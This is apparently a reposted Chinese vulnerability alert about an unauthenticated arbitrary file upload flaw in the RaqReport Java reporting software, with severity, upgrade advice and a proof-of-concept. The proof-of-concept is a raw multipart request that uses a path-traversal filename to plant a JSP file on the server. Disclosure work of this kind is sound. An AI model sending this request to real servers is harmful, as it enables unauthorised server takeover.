漏洞预警 | 润乾报表任意文件上传漏洞

admin

102611
文章

87
评论

2024年4月17日14:30:52评论22 views字数 887阅读2分57秒阅读模式

0x00 漏洞编号

暂无

0x01 危险等级

高危

0x02 漏洞概述

润乾报表是一个纯JAVA的企业级报表工具，润乾报表作为领先的企业级报表分析软件，提供了高效的报表设计方案、强大的报表展现能力、灵活的部署机制，以及支持强关联语义模型。这些功能使得润乾报表能够为企业级数据分析与商业智能提供高性能、高效率的报表系统解决方案。

漏洞预警 | 润乾报表任意文件上传漏洞

0x03 漏洞详情

漏洞类型：文件上传

影响：控制服务器

简述：润乾报表存在任意文件上传漏洞，未授权的攻击者可以通过该漏洞上传任意恶意文件，从而控制服务器。

0x04 影响版本

润乾报表

0x05 POC

POST /InputServlet?action=12 HTTP/1.1Host: {host}Content-Type: multipart/form-data; boundary=--------------------------170005680039721412137562Accept-Encoding: gzip, deflate, brContent-Length: 2401----------------------------170005680039721412137562Content-Disposition: form-data; name="upsize"1024----------------------------170005680039721412137562Content-Disposition: form-data; name="file"; filename="/..\..2.jsp"Content-Type: image/png11111----------------------------170005680039721412137562--

仅供安全研究与学习之用，若将工具做其他用途，由使用者承担全部法律及连带责任，作者及发布者不承担任何法律及连带责任。

0x06 修复建议

目前官方已发布漏洞修复版本，建议用户升级到安全版本：

https://www.raqsoft.com.cn/

原文始发于微信公众号（浅安安全）：漏洞预警 | 润乾报表任意文件上传漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

漏洞预警 | 润乾报表任意文件上传漏洞

暂无

MajorDoMo 未授权RCE漏洞

QVD-2024-15263禅道项目管理系统身份认证绕过

某直辖市HW三甲医院公众号越权漏洞泄露8W+个人信息

禅道项目管理系统身份认证绕过

Pkpmbs建设工程质量监督系统FileUpOrDown.ashx存在文件上传漏洞

CVE-2024-24488

用友NC grouptemplet 任意文件上传漏洞

瑞友天翼虚拟化系统-SQL注入-ConsoleExternalApi

用友一波POC/EXP

禅道 zentaosid 身份认证绕过漏洞

发表评论

在线咨询

微信